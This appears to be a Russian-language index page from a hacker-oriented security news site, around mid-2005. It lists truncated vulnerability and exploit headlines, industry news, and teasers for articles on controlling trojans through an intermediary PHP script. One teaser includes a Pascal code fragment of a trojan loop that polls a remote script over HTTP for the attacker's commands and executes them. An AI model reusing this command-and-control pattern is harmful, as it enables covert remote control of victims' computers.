DoS в cabinet.dll и утилите makecab.exe
В Библиотеке сжатия cabinet.dll и в утилите makecab.exe обнаружена уязвимость. Во время сжатия файла с любым именем и содерж…
Обход фильтрации ipfw в FreeBSD
Уязвимость позволяет удаленному пользователю обойти фильтрацию пакетов. Уязвимость существует при включенной опции PREEMPTIO…
Отказ в обслуживании в реализации TCP стека во FreeBSD
Обнаруженные уязвимости позволяют удаленному пользователю вызвать отказ в обслуживании.
Отказ в обслуживании в Clam AntiVirus
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании системы.
Обход аутентификации в Cisco IOS RADIUS
Уязвимость позволят удаленному пользователю обойти аутентификацию и получить неавторизованный доступ к ресурсам сети. Уязвим…
Удаленная перезагрузка устройств с Symbian OS (эксплоит)
Мобильные устройства на основе Symbian OS с поддержкой Bluetooth могут быть удаленно перезагружены простой передачей специал…
Управление трояном через скрипт-посредник №2
Код, реализующий это, выглядит так: // сначала запрос пустой request:=''; // цикл работы трояна while true do begin // отсылаем скрипту запрос if (SendStringViaHTTP('127.0.0.1', 'test1.ru', 80, '/index.php', request, answer)<>0) then begin // если отослать не удалось - ждём минуту и крутим следующую итерацию sleep(1000*SEC); continue; end; // если отослать удалось - проверим answer if (answer='') then begin // команд от хакера нет - очистим reques, // ждём минуту и крутим следующую итерацию request:=''; sleep(1000*SEC); continue; end; // если управление дошло сюда - в answer у нас команда хакера // выполняем команду request:=DoCommand(answer); end; Здесь answer и request у нас глобальные переменные типа AnsiString
Выполнение произвольного PHP сценария в phpBB (эксплоит)
Уязвимость в viewtopic.php в версиях до 2.0.15.
Последняя ревизия Windows 2000
Корпорация Microsoft выпустила пакет обновлений Update Rollup для операционной системы Windows 2000.
Япония будет бороться с опасной информацией в интернете
Япония намерена вести борьбу с опасной информацией интернете. К информации, которой не место в онлайне, относятся, например,…
Автор DeCSS снова с утилитой
Йон Лех Йохансен, автор программы DeCSS для обхода защиты от копирования DVD-дисков, выложил на своем веб-сайте "патч", поср…
HTTP Request Smuggling атака в web сервере Apache
Уязвимость позволяет удаленному пользователю произвести HTTP Request Smuggling атаку (атаку со скрытым HTTP запросом) на web…
Переполнение буфера в Microsoft Internet Explorer в библиотеке javaprxy.dll
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.…
Удаленное выполнение PHP кода в XML-RPC for PHP
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость в XML-RPC fo…
Отказ в обслуживании в Blue Coat Systems ProxySG
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения. Уязвимость существует в реализации TCP…
PHP-инклюдинг в Pavsta Auto Site
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует п…
Выполнение произвольного PHP сценария в phpBB в коде highlighting
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует и…
Stringer 2.1 beta
Большинство DOS-программ и некоторые программы под WINDOWS3.
Повышение привилегий в Adobe Acrobat/Adobe Reader Updater для MAC OS
Программа: Adobe Reader и Adobe Acrobat 7.0 и 7.1 для MAC OS
Взломанные сайты:30.06.2005
Взломан:
7-Zip 4.23
Архиватор с интеграцией в оболочку Windows и поддержкой ZIP, RAR (включая RAR 3), CAB, 7z (собственный очень эффективный по степени сжатия формат), GZIP, BZIP2 и TAR архивов.
Взломанные сайты:29.06.2005
Взломан:
Google персонализируется
Google продолжает заманивать пользователей новыми услугами. Создав недавно поисковую систему для мобильных устройств, компан…
Полный набор для шифрования по XML
Консорциум W3С утвердил в качестве официальных рекомендаций стандарт XML Key Management System 2.0 для управления публичными…
Британские кардеры сдавали деньги русским
Арест и тюремное заключение двух жителей Великобритании стали результатом международной операции по борьбе с ф…
Выполнение произвольных приложений в Adobe Reader и Adobe Acrobat для MAC OS
Уязвимость позволяет удаленному пользователю выполнить произвольное приложение на целевой системе. Удаленный пользователь мо…
Повышение привилегий в загрузчике ld.so в Sun Solaris
Уязвимость позволяет локальному пользователю повысить свои привилегии на системе. Уязвимость существует из-за некорректной о…
Межсайтовый скриптинг в Community Server
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других …
Множественные уязвимости в ASP Nuke
Программа: ASP Nuke 0.80 и более ранние версии Обнаруженные уязвимости позволяют удаленному пользователю произвести X…
Загрузка произвольных файлов в ASPPlayground.NET
Уязвимость позволяет удаленному пользователю загрузить произвольные файлы на сервер. Удаленный пользователь может послать сф…
Межсайтовый скриптинг в Mensajeitor
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других …
Межсайтовый скриптинг в PHP-Nuke
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других …
PHP-инклюдинг в JCDex Lite
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует в…
Управление трояном через скрипт-посредник №1
Статья предназначена для более-менее опытных троянмейкеров, умеющих работать с TCP/IP через API и знакомых с HTTP-протоколом, в частности, с методом POST. Кроме того, необходимо разбираться в PHP на уровне работы с текстовыми файлами, строками и суперглобальными ассоциированными массивами (к коим относятся $_GET, $_POST и $_SERVER)
Отказ в обслуживании в IA eMailServer
Уязвимость позволяет удаленному авторизованному пользователю вызвать отказ в обслуживании приложения. Уязвимость существует …
Выполнение произвольных команд в CSV_DB
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе. Уязвимость существует из-за …
Раскрытие базы данных в Sukru Alatas`s Guestbook
Уязвимость позволяет удаленному пользователю получить доступ к базе данных приложения. Удаленный пользователь может с помощь…
Рекорд-лейблы судятся с админами
Понимая, что тягаться с интернет-провайдерами им пока не по силам, представители звукозаписывающих компаний нашли себе новых…
Оконный доступ к БД
Хочу рассказать об одном интересном случае из собственной практики. Мой коллега, Web-программист, имеет довольно забавное хобби. Он коллекционирует видеофильмы, естественно и сайт с описанием этих самых фильмов сделал и каталогизирует все аккуратно и трепетно
Владельцев файлообменных сетей будут преследовать в суде
Владельцы и администраторы файлообменных сетей, подобные Grokster и Morpheus, могут быть привлечены к судебной ответственнос…
Бумажный спецвыпуск
Материалы для подписчиков
Вопросы по материалам и подписке: support@glc.ru
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —
самой забойной защитой от DDoS в мире
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —самой забойной защитой от DDoS в мире